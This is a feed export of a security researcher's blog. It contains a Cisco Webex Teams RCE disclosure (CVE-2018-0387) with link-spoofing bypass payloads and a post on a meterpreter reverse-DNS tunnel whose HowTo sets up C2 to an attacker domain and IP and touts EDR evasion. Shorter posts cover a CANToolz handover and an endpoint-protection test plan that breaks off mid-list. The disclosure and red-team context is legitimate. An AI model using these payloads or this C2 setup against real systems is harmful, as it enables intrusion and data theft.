tag:blogger.com,1999:blog-47116128080267915192024-03-18T03:36:20.718-07:00asintsovAlexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.comBlogger29125tag:blogger.com,1999:blog-4711612808026791519.post-67450817675983584422018-07-23T07:48:00.000-07:002018-08-15T06:35:16.239-07:00Cisco Webex Teams Remote Code Execution Vulnerability (CVE-2018-0387)<div dir="ltr" style="text-align: left;" trbidi="on">
Hello all,<br />
<br />
This time I want to talk about our internal Red Team experience. Just want to share my bug-story for Cisco WebEx Teams (previously known as Cisco Spark). We are using this awesome messenger because it can provide good quality communication channel between employees and also have a lot of cool features: group chats (like old good IRC channels), video/audios and pictures/files sharing and more. It is an enterprise cloud-based solution with all cool encryption, SSO integration and privacy things, but at this moment it is not a subject of this post.<br />
<br />
I want to disclose some detail about the vulnerability we found - <span style="background-color: white; color: #333333; font-family: "open sans regular"; font-size: 16px;"><b>CVE-2018-0387</b></span>: <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180718-webex-teams-rce">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180718-webex-teams-rce</a><br />
<br />
<br />
<a name='more'></a><br />
<br />
Vulnerability was found in HTML validator/cleaner, that are checks that “message” is “safe”. Cisco WebEx Teams are using Qt and MSHTML(on windows) module for rendering all messages in the chat window. To reproduce steps i created this simple logic (this is just my simplefied version of logic and all names are fake, but in real software everything is more complictaed and alittle bit different):<br />
<br />
<br />
<blockquote class="tr_bq">
SENDER:<br />
M = message_from_input ; Input of the user<br />
H = create_html(M) ; Make a HTML with the message<br />
S = clean_html(H) ; make sure that HTML is safe and remove all tags/js/attributes that are not<br />
; defined in the patterns<br />
E = encrypt_html(S) ; encryption magic<br />
send_message(E) ; send encrypted HTML message to the cloud</blockquote>
<br />
<br />
<blockquote class="tr_bq">
RECIEVER:<br />
E = recieve_message() ; Get new message from the server<br />
D = decrypt(E) ; decryption magic<br />
S = clean_html(D) ; make sure that HTML is safe and remove all tags/js/attributes that are not<br />
; defined in the patterns<br />
put_message(S) ; put in local database, and render </blockquote>
<br />
<br />
First I tried to inject some XSS vectors, but all of them were cleaned and removed. They have hardcoded patterns, and anything that are not “whitelisted” will be cleaned. Probably it is result of <a href="https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171004-sprk">https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20171004-sprk</a> but I could be wrong. Anyway, this attack vector does not work (or I am too lazy to bypass it).<br />
Then it is an interesting thing: how the software supports markdown syntaxes. And actually it parsing markdown tokens and format the input into valid HTML. Of course most interesting part here: supporting URL. Let’s say input like this:<br />
<br />
<blockquote class="tr_bq">
[TEST](http://test.test) </blockquote>
<br />
will be converted into:<br />
<br />
<blockquote class="tr_bq">
<p><a href=http://test.test alt=”http://test.test”>TEST</a></p></blockquote>
<br />
Unfortunately it is not possible to inject “ for XSS and etc – it will be not parsed as markdown, and even if it will be parsed – anyway it will be cleaned after that in HTML cleaner. Also want to say that ‘clean’ function called on ‘victim’ side, after the message will be received and decrypted. All we need to check if this function can be ‘fooled’. But as I said before – I did not found how check on HTML patterns can be bypassed. Last thing to check – URI scheme patterns, and Cisco developers also did knows about it, and that is why they add check on URI: it can be https://, http://, ftp:// and input<br />
<br />
<blockquote class="tr_bq">
[TEST](file://test.test) </blockquote>
<br />
will be converted into:<br />
<br />
<blockquote class="tr_bq">
<p><a>file://test.test</a></p></blockquote>
<br />
Other words – just into the text, without href.<br />
but as I always said – design is one thing, implementation is another. It is very important HOW you do this check and unfortunately there were just substring check in whole string. An attacker can do next input:<br />
<br />
<blockquote class="tr_bq">
[http://bypass.com](file://test.test?http://bypass.com)</blockquote>
<br />
and this one will pass the check and will be converted into:<br />
<br />
<blockquote class="tr_bq">
<p><a href=file://test.test?http://bypass.com<br />
alt=”file://test.test?http://bypass.com”> file://test.test?http://bypass.com</a></p></blockquote>
<br />
This is already bad, but also you can see that clean function also removed original text (http://bypass.com) and put the real link instead (with file://)… so if it will be a real attack, then victim will see that message is kind of suspicious. But I was also able to make a small trick: if in URL, after ‘http://’ I will use not Latin symbol, but Cyrillic:<br />
<br />
<blockquote class="tr_bq">
[http://bypАss.com](file://test.test?http://bypАss.com)</blockquote>
<br />
then it will be more interesting rendering:<br />
<blockquote class="tr_bq">
<p><a href=file://test.test?http://bypАss.com<br />
alt=”file://test.test?http://bypАss.com”> http://bypАss.com </a></p></blockquote>
<br />
Now it will be rendered with the fake link, and real link only will be visible in case of manual check by moving mouse over the link:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjs2Q7O6gVW8cBOt1odhetzPI-7PcELMthuM_HgHLVdY1KiUNNu8R8HVxVZSE66LE_XhSUsiunz94zeax2i5o7iFWuyb8FHParC7vNbiMOhgZt9FVD_qbkL1pH6rCH-Y3GL3CB3L23O938/s1600/ciscospark.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="323" data-original-width="824" height="249" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgjs2Q7O6gVW8cBOt1odhetzPI-7PcELMthuM_HgHLVdY1KiUNNu8R8HVxVZSE66LE_XhSUsiunz94zeax2i5o7iFWuyb8FHParC7vNbiMOhgZt9FVD_qbkL1pH6rCH-Y3GL3CB3L23O938/s640/ciscospark.png" width="640" /></a></div>
<div style="text-align: right;">
<br /></div>
<div style="text-align: right;">
Exploit link in the chat window (with caption text when mouse-over)</div>
<br />
Our internal tests confirm, that users are not accurate enough with such links (because URL is already in the text, and in pop-up caption link is also ends-up with same 'fake' URL). This issue could be used for getting stable RCE, for that an attacker need to use a malicious host with some payload and also he needs a netbios name for an exploit link and if victim will click on this link then this code will be executed immediately without any warnings or additional steps (in vido demo it was .bat file with ‘malicious’ code to execute).<br />
<br />
Exploit Protection systems can not stop or detect this exploit/attacks since a legitimate mechanism was used, anyway we have added IoC for this exploit to our EDR solution to monitor abnormal child processes that were spawned from Cisco Spark process.<br />
<br />
In general, this attack vector is limited, since the attacker need to have access to your company chatting area, so it can be: external users that are invited to your space, external bots or internal ‘malicious’ or ‘infected’ users). Also the file:// should link to a local resource (URI with netbios name in remote case or local path) form maximum effect, in other cases (WebDav/UNC from Internet or using IP as a remote host) clicking on an exploit link will trigger default Windows warning pop-up (but if user click on "yes" button then malicious coude will be loaded from the Internet).<br />
<div>
<br /></div>
<b>UPD: this exploit was possible to exploit by externals, since you can register into WebEx Teams, with any e-mail and search for any corp. person and send messages with exploit link.</b><br />
<b><br /></b><br /><br />
PoC video:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen='allowfullscreen' webkitallowfullscreen='webkitallowfullscreen' mozallowfullscreen='mozallowfullscreen' width='1024' height='768' src='https://www.blogger.com/video.g?token=AD6v5dyDXvKXOtihI_6Tdseh39BDr79Y2Faf9mUtyOzy8oqNcxHSNiTiGVEKzyjhOvsGXgmxsAmZcqHjxGWmUlDIlg' class='b-hbp-video b-uploaded' frameborder='0'></iframe></div>
<br />
<br />
Timeline:<br />
<blockquote class="tr_bq">
Jan 22 2018 – Issue was reported to Cisco PSIRT<br />
~ Mar 21 2018 – Issue was fixed and update was rolled out<br />
Jul 18 2018 – Advisory released by Cisco</blockquote>
<div>
<br /></div>
</div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com5tag:blogger.com,1999:blog-4711612808026791519.post-53513909980626261212017-12-01T06:10:00.003-08:002017-12-06T16:54:16.324-08:00Data exfiltration with Metasploit: meterpreter DNS tunnel<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<b>Meterpreter </b>is a well-known <b>Metasploit</b>[1] remote agent for pentester's needs. This multi-staged payload is a good, flexible and easy-to-use platform that allows pentesters to have remote control over <strike>pwned</strike>penetrated host[2]. Currently it supports following "network" transports:<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<ul style="text-align: left;">
<li>Binding TCP port</li>
<li>Reverse connection over TCP/IP</li>
<li>Reverse connection over HTTP </li>
</ul>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1SEsprHsqOdymMaY3A8pkr9cmAbwhhLFhemMOHj4fjxFvDPnLbiEorimg6Pqj9gaI6wFh2XU8xuljzol-1Va1meTJusN1ecMXnDUyBS5pH9VCA0rX3imcKbwm9NClO7QS1KFhBNX-6ute/s1600/logo1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="102" data-original-width="449" height="144" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg1SEsprHsqOdymMaY3A8pkr9cmAbwhhLFhemMOHj4fjxFvDPnLbiEorimg6Pqj9gaI6wFh2XU8xuljzol-1Va1meTJusN1ecMXnDUyBS5pH9VCA0rX3imcKbwm9NClO7QS1KFhBNX-6ute/s640/logo1.png" width="640" /></a></div>
<br />
<br />
<br />
Last year we, at <a href="https://defcon-russia.ru/">defcon-russia</a>, have started a fun opensource community project regarding implementing another network transport for <b>meterpreter: reverse DNS</b> (tunnel). Last week we also have presented it at <a href="https://2017.zeronights.org/">ZeroNights</a>. In that blog-post I want to share results of this work, future plans and main benefits and features.<br />
<b><br /></b>
<br />
<h4 style="text-align: left;">
Transport design and components</h4>
Our current "pre-release" is only supports windows platforms (both, x64/x86) and consists of following main components:<br />
<br />
<br />
<ul style="text-align: left;">
<li><a href="https://github.com/defcon-russia/metasploit-payloads/blob/master/python/meterpreter/dns_server.py">DNS MSF Bridge</a> (as intermediate server)</li>
<li><a href="https://github.com/defcon-russia/metasploit-payloads/blob/master/c/meterpreter/source/server/win/server_transport_windns.c">Meterpreter DNS transport</a></li>
<li><a href="https://github.com/defcon-russia/metasploit-framework/blob/master/lib/msf/core/payload/windows/reverse_dns.rb">MSF stager</a> payloads (shellcodes, x64/x86)</li>
</ul>
<br />
<div style="text-align: left;">
The DNS MSF Bridge is a Python script which is used as DNS server. This is key component that is working in Internet as Name Server, parsing DNS requests and sending encapsulated data back. Normal DNS tunnel. At the same time this script binds a TCP port for MSF clients (pentesters). So pentester could use MSF and control pwned target through this DNS bridge. In other words this script is acting as a transport proxy.<span style="background-color: white; font-family: "arial" , sans-serif; font-size: 13px; white-space: nowrap;"> </span>Currently we have not implemented "native" DNS service in Ruby, but there we reasons for that. Main reason is practical: when you do a pentest, you just put this DNS script on, let's say, EC2 instance, put NS records for main domain to that IP and then you could work with it from any place using MSF. More than this - with DNS Bridge we have implemented multi-console and payload support. This means that two or more pentesters could work at the same time with different targets and tasks using same DNS Bridge server and domain name. Currently one DNS Bridge (domain) supports up to 26 parallel sessions (pwned hosts) </div>
<br />
<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Bip-vwMSrPy1y9xgNki6xVAvV1aQjAtULKT_yvtWrSX-7cPuwoWVvUvCfCHoiPddwxiLNMW1PW-1zL9Gko9DOSExJoLgTFzWwOWB1ym80CSlweY9MntOfL59QrfZDH8jXtQXP7QAwSsa/s1600/design1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="612" data-original-width="1088" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh1Bip-vwMSrPy1y9xgNki6xVAvV1aQjAtULKT_yvtWrSX-7cPuwoWVvUvCfCHoiPddwxiLNMW1PW-1zL9Gko9DOSExJoLgTFzWwOWB1ym80CSlweY9MntOfL59QrfZDH8jXtQXP7QAwSsa/s1600/design1.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<br />
<br />
Currently we support two types of DNS tunnels: <b>DNSKEY </b>RR and <b>AAAA </b>RR. This means that we have supported all these tunnels both in shellcodes and in metsrv agent.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_uYYTkOEl5WXlKcqSNTP796nbHr76ca5NXmNOCIQ2XSvXvfpKJDaQm4PSVwRwm7HDFhGj-CzPCXWFF2d4xxbqosqxntWc10UUyd_cRmkxQzcvyU-TAzNjoQofOFRpzNEnAvmRw6vV0zeE/s1600/satges.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="524" data-original-width="1152" height="290" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_uYYTkOEl5WXlKcqSNTP796nbHr76ca5NXmNOCIQ2XSvXvfpKJDaQm4PSVwRwm7HDFhGj-CzPCXWFF2d4xxbqosqxntWc10UUyd_cRmkxQzcvyU-TAzNjoQofOFRpzNEnAvmRw6vV0zeE/s640/satges.png" width="640" /></a></div>
<br />
<br />
And now we have whole transport over DNS, shellcode stager downloads main payload (meterpreer) over DNS and runs it from the memory. And meterpreter is also using same DNS transport. Now you do not need TCP/IP DNS tunnels with additional software, like Powershell script or Dnscat2. It is more stealth because with Dnscat/Iodine or any other TCP/IP over DNS you need to run additional process and bind local port for tunneling, which could be detected by local AV/EPP, but now, it is done in right, native, way in MSF payload itself, and it means that no sockets and tunnel processes/binaries/scripts needed anymore. Also we have now less overhead for tunneling traffic. We do not encapsulating TCP/IP headers, only payload(stage) body and TLV packets for metsrv. So it is faster.<br />
<br />
Regarding tunnel's types:<br />
<b><br />AAAA </b>- is slower, but it could be used from Windows XP. And yes, you can use this tunnel even if no IPv6 is used/installed on the victim box! To make this possible, we are using only reserved IPv6 address in responses, which will be passed anyway.<br />
<br />
<b>DNSKEY - </b>this can be used only on Windows 7, but it is much faster.<br />
<br />
Upload tunnel is based on subdomain values. So we have TLV encoded with base32.<br />
<br />
Encryption - we do not use any additional encryption right now. It means that payloads will be passed "plain-text" in DNS responses. In case of AAAA tunnel it will be fragmented by IP addresses, in case of DNSKEY it will be 16 KB slice per response (TCP will be used).<br />
<br />
Meterpreter communication is using standard encryption with session keys (AES+XOR).<br />
<br />
While testing speed I got following results on different networks:<br />
<br />
Upload<br />
<b>base32 </b>- from 1 KB/sec to <b>4 KB/sec</b><br />
Downlink<br />
<b>AAAA </b>- from 4 KB/sec to <b>16 KB/sec</b><br />
<b>DNSKEY </b>- from 86 KB/sec to <b>660 KB/sec</b><br />
<br />
Speed is really depends on many things in the env and network, but in enterprise networks it will be "fast". So DNSKEY shellcodes download Meterpreter stage for 2 seconds, I think it is good enough for practical usage. But of course it depends from many things. Meterpreter also needs at least StdLib loaded first, and it will take some time (also few seconds) as well. Migration process also depends on download speed.<br />
<br />
<h4 style="text-align: left;">
Benefits</h4>
<br />
Let's now review all features and why this transport could be used. Main profit - is accessing hosts in "isolated" vlans/networks. I still remember doing a pentest for one company when I was performing a social engineering project, where part of it was sending e-mails with PDF exploit to employees with 'no internet' policy. How to control such hosts in case if attack was successful? Reverse DNS tunnel is an answer! Also that was a way how we escaped from network sandboxes and etc (for example some EDR/EPP have a feature to isolate compromised host from intruder access, but with DNS tunnel, we still can save our control). All this happened because pwned box do not so any connections outside of LAN/DMZ, only to local corporate DNS server.<br />
<br />
Another cool feature - "socket less" control which is applicable for Windows platforms. Main thing here that our agent(meterpreter, pwned process) do not need to spawn a connection, bind port or anything like this for doing DNS resolve. This is happened because MS DNS Cache will do all work for you. In other words, let's say we are injected into notepad.exe. Notepad.exe will try to setup a DNS tunnel with us through local corporate DNS server, but UDP/TCP connection with that corporate DNS will be done not by notepad.exe but by svchost.exe. So we got +5 to stealth.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJwM1JlmHZccEJEYRgvIrlP2K4utDTPbWzpH2Xk4EJqP-0lYWbOKOBIAGeXNBk-P37GjaWqoXgm-BB4aU7Cjwt-fyYt3qF93zpjQ1vvlYEdPFPB470Q_JydMS3ppk3VgekOsVQtb4JvDM1/s1600/sock.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="508" data-original-width="961" height="338" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJwM1JlmHZccEJEYRgvIrlP2K4utDTPbWzpH2Xk4EJqP-0lYWbOKOBIAGeXNBk-P37GjaWqoXgm-BB4aU7Cjwt-fyYt3qF93zpjQ1vvlYEdPFPB470Q_JydMS3ppk3VgekOsVQtb4JvDM1/s640/sock.png" width="640" /></a></div>
<br />
<br />
And again, for most EDR solutions it will be not visible.<br />
<br />
<h4 style="text-align: left;">
HowTo</h4>
<br />
0) git clone and install https://github.com/defcon-russia/metasploit-framework<br />
1) Buy a domain. Shorter better. Like:<i> msf.ws</i><br />
2) get a hosting like EC2 (let's say IP will be 1.2.3.4)<br />
3) put NS records to msf.ws to the IP of that server<br />
4) Deploy DNS MSF Bridge to that server, run it<br />
<br />
<blockquote class="tr_bq">
./dns_server.py --ipaddr 1.2.3.4 --domain msf.ws</blockquote>
<br />
5) Prepare a payload<br />
<br />
<blockquote class="tr_bq">
./msfvenom -p windows/meterpreter/reverse_dns DOMIAN=msf.ws RHOST=1.2.3.4</blockquote>
<br />
6) prepare an exploit with generated payload<br />
<br />
7) run the MSF handler<br />
<br />
<blockquote class="tr_bq">
use exploit/multi/handler<br />
set payload windows/meterpreter/reverse_dns<br />
set DOMAIN msf.ws<br />
set RHOST 1.2.3.4<br />
run</blockquote>
8) deliver an exploit to targets and wait... sessions will be spawned<br />
<br />
<h4 style="text-align: left;">
Feature plans</h4>
Currently we are trying to get this transport into main MSF fork. This means that merge work need to be done - and it is in progress now. This activity including creating native DNS handler support (so it should work if we could use MSF as a DNS server, without Bridge) is now our main target. If you want help us, please let us know!<br />
<br />
After (and IF) merge will be done and this work will be not just fork, but part of Metasploit, then we could start implementing more features:<br />
<br />
<ul style="text-align: left;">
<li> Payload XOR encryption for stager </li>
<li> Powershell/VBS stagers</li>
<li> Adding more OS platforms supported</li>
<li> more types of tunnels: TXT, NULL and etc</li>
</ul>
<br />
If you want to help and participate - let us know!<br />
<br />
If you have any questions or ideas - feel free to contact us at IRC(freenode.org #Metasploit, ask <b>RageLtMan</b>), Telegram (https://t.me/DCG7812 -- warning, Russian lang is main, but we could speak English a little bit! Ask me or <b>max3raza</b>). Or just drop an e-mail...<br />
<br />
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<span style="font-family: "calibri"; font-size: 18pt;">Sources:</span></div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<br />
<ul style="text-align: left;">
<li><a href="https://github.com/defcon-russia/metasploit-framework"><span style="font-family: "calibri"; font-size: 18pt;">https://</span><span style="font-family: "calibri"; font-size: 18pt;">github.com/defcon-russia/metasploit-framework</span></a></li>
<li><span style="font-family: "calibri"; font-size: 18pt;"> <a href="https://www.blogger.com/goog_24869399">https://</a></span><span style="font-family: "calibri"; font-size: 18pt;"><a href="http://github.com/defcon-russia/metasploit-payloads">github.com/defcon-russia/metasploit-payloads</a></span></li>
</ul>
</div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
</div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<span style="font-family: "calibri"; font-size: 18pt;"><br /></span></div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<br />
<ul style="text-align: left;">
<li><a href="https://defcon-russia.ru/meetups/zn2017/ms.pdf?dwl" style="font-family: calibri; font-size: 18pt;">ZN Slides</a></li>
</ul>
<span style="font-family: "calibri"; font-size: 18pt;"><br /></span></div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<span style="font-family: "calibri"; font-size: 18pt;">Usage Demo: </span></div>
<div style="text-align: left;">
</div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/Lzb8LFt8Whg/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/Lzb8LFt8Whg?feature=player_embedded" width="320"></iframe></div>
<div style="margin-bottom: 0pt; margin-left: 0in; margin-top: 0pt; text-align: left; unicode-bidi: embed; word-break: normal;">
<br /></div>
<br />
<br />
<br />
<br />
[1] <a href="https://github.com/rapid7/metasploit-framework/wiki/Meterpreter">https://github.com/rapid7/metasploit-framework/wiki/Meterpreter</a><br />
[2] <a href="https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/">https://www.offensive-security.com/metasploit-unleashed/about-meterpreter/</a><br />
<br /></div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com32tag:blogger.com,1999:blog-4711612808026791519.post-49397419657258982442017-08-18T03:29:00.000-07:002017-08-18T03:54:36.982-07:00Next page in CANToolz life<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div class="separator" style="clear: both; text-align: center;">
</div>
Hello to all <b>CANToolz </b>users (And I know both of them, yeah..)!<br />
<br />
<br />
There are few things happened. First of all, unfortunately for me it is very difficult to work on new features and maintain the project... one of the main reasons - I do not have hardware (even car), so it is not the best environment for development. Working with remote testers is very difficult and not so productive. I have a lot of ideas and plans, but it is not possible to implement them without proper support (from the community or good R&D team, for example) or without comprehensive testing environment (hardware, vehicles and etc) and of course without enough free time... <br />
<br />
Just one more example is <b>CAN-Pick</b>: <a href="https://cansecwest.com/slides/2017/CSW2017_MinruiYan-JianhaoLiu_A_visualization_tool_for_evaluating_CAN-bus_cybersecurity.pdf">https://cansecwest.com/slides/2017/CSW2017_MinruiYan-JianhaoLiu_A_visualization_tool_for_evaluating_CAN-bus_cybersecurity.pdf</a> <br />
<br />
This tool was also presented on BlackHat US 17: <a href="https://www.blackhat.com/us-17/arsenal/schedule/index.html#can-pick---a-visualization-tool-for-evaluating-can-bus-cybersecurity---arsenal-theater-demo-7026">https://www.blackhat.com/us-17/arsenal/schedule/index.html#can-pick---a-visualization-tool-for-evaluating-can-bus-cybersecurity---arsenal-theater-demo-7026</a><br />
<br />
As far as I can see here <b>CANToolz </b>was used as the "engine" and/or the source of ideas(e.g. modules) for <b>CAN-Picks</b>. Yes, they have missed few modules that was introduce after, but maybe they do not need them 8)<br />
<br />
But anyway I <b>want other people to use CANToolz</b>, especially when they <b>can do with it more then me</b>! And these guys with their resources and talents can do a lot, for example they have added graph visualization and dynamic config and module loading which I planned to do, but had no time... so they did a great work! But may be I am just a little bit disappointed that they did not want to contribute to <b>CANToolz </b>with their ideas and code, ha-ha-ha, but this typical example of high expectations 8)) <br />
<br />
<div style="text-align: left;">
Anyway, this is the time for some changes, and the best idea here: to change the maintainer... so please welcome the new maintainer: <span style="background-color: white; color: #24292e;"><b><span style="font-family: "arial" , "helvetica" , sans-serif;">Tao Sauvage</span></b></span><span style="background-color: white; color: #24292e; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-weight: 600;">. </span></div>
<div style="text-align: left;">
<span style="background-color: white; color: #24292e; font-family: , "blinkmacsystemfont" , "segoe ui" , "helvetica" , "arial" , sans-serif , "apple color emoji" , "segoe ui emoji" , "segoe ui symbol"; font-weight: 600;"><br /></span></div>
<div style="text-align: left;">
<b>Tao</b> helped CANToolz a lot with contribution, bug reports, ideas and moral support. He is an active CANToolz user who is helping the project development, and I believe he can provide much more as a leader there! Thank you Tao!<br /><br /> I will stay as a supporter and if I have more time and resources for unrealized ideas - then I will also contribute. Any way I am still here :-)</div>
<br />
Or yeah... on of the main reasons for this post, new GitHub url:<br />
<b>NEW GitHub</b>: <a href="https://github.com/CANToolz/CANToolz">https://github.com/CANToolz/CANToolz</a></div>
Alexey Sintsovhttp://www.blogger.com/profile/16563676942164858618noreply@blogger.com2tag:blogger.com,1999:blog-4711612808026791519.post-85300078220243608832017-02-07T06:18:00.000-08:002017-02-08T05:05:07.471-08:00How I have tested EndPointProtection solution...<div dir="ltr" style="text-align: left;" trbidi="on">
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";"> Just finished evaluation for some EPP products. And I found difficult this challenge: how to chose solution that will fit your organisation. Of course first you need to understand if it is reasonable to spend money for EPP, probably you can get same or better results without EPP (like better app-control, DeviceGuard and etc). But if you sure, that you need it, and it is the only one way for you, then what you gonna do? Right answer - run PoC/pilot with chosen vendors, and check what YOU as a customer need. Sales demos and presentations, NSS lab reports and Gartner qaudrants - will not help much. I want to share just how I did it. (it is not a best or full way, I am working not in SECURITY company, so it just a way how I can differ one solution from another as a customer, from techincal point of view). This text is only about exploits/attacks protection quality, and I do not want to cover too much other things in this blog-post, but they are also important, for example: classification of collected data (by vendor/solution, if we have deal with cloud based solutions), report quality, SIEM integration, customization, perfomance, attack surface (yes, even EPP making your attack surface bigger, like any AV...) and etc... </span></div>
<div style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";">C</span></div>
<div style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";"><br /></span></div>
<h3 style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";"> </span></h3>
<h3 style="margin: 0in 0.5in 0.0001pt -7.1pt; text-align: left; text-indent: -0.25in;">
<span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-family: "Nokia Sans"; mso-bidi-font-size: 12.0pt; mso-fareast-font-family: "Nokia Sans";"> 1.<span style="font-family: "times new roman"; font-size: 7pt; font-stretch: normal; font-weight: normal; line-height: normal;"> </span></span><span style="font-family: "nokia sans" , sans-serif; mso-bidi-font-size: 12.0pt;">My test
methodology (exploit/attack/malware protection quality)</span></h3>
<h1 style="margin: 0in 0.5in 0.0001pt -7.1pt; text-indent: -0.25in;">
</h1>
<h1 style="margin: 0in 0.5in 0.0001pt -7.1pt; text-indent: -0.25in;">
<o:p></o:p></h1>
<div class="11BodyText" style="margin-left: 0in; text-indent: .25in;">
<br /></div>
<div class="11BodyText" style="margin-left: 0in; text-indent: .25in;">
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhebttUhtvLTdxOaTgERN2-PHBfRJ2-fVJrT8PdsGNyJF-e1Mds_2x_vwj5bugpGqvAfj1GNzdvBA5yuRThlrtsi8hvvGTGWtO8ORlJ9Xto2KX0VZIdBeo0u2r43fhJm_veeGN_EPRr6Q8y/s1600/clip_image001.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="460" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhebttUhtvLTdxOaTgERN2-PHBfRJ2-fVJrT8PdsGNyJF-e1Mds_2x_vwj5bugpGqvAfj1GNzdvBA5yuRThlrtsi8hvvGTGWtO8ORlJ9Xto2KX0VZIdBeo0u2r43fhJm_veeGN_EPRr6Q8y/s640/clip_image001.png" width="640" /></a></div>
<br /></div>
<div align="right" class="11BodyText" style="margin-bottom: .0001pt; margin: 0in; text-align: right; text-indent: .25in;">
Pic 1. Kill Chain stages that are chosen by
us for testing.<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 0in;">
<br /></div>
<h3 style="margin-left: 0in; text-align: left;">
<o:p> </o:p>1.1<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span>Coverage and quality</h3>
<h4 style="margin-left: 0in; text-align: left;">
<span style="font-weight: normal; mso-bidi-font-family: "Nokia Sans"; mso-fareast-font-family: "Nokia Sans";">1.1.1<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span></span>Delivery</h4>
<h2 style="margin-left: 1.25in; mso-list: l2 level3 lfo1;">
<o:p></o:p></h2>
<div class="11BodyText">
I have prepared few different exploits for testing:<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->a)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->HTML file with Buffer Overflow exploit in
browser plugin (0day)<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
<!--[if !supportLists]-->b)<span style="font-size: 7pt; font-stretch: normal; font-variant-numeric: normal; line-height: normal;">
</span><!--[endif]-->HTML file with Use-After-Free exploit in browser
plugin (0day)<o:p></o:p></div>
<div class="11BodyText" style="margin-left: 82.9pt; mso-list: l3 level1 lfo3; text-indent: -.25in;">
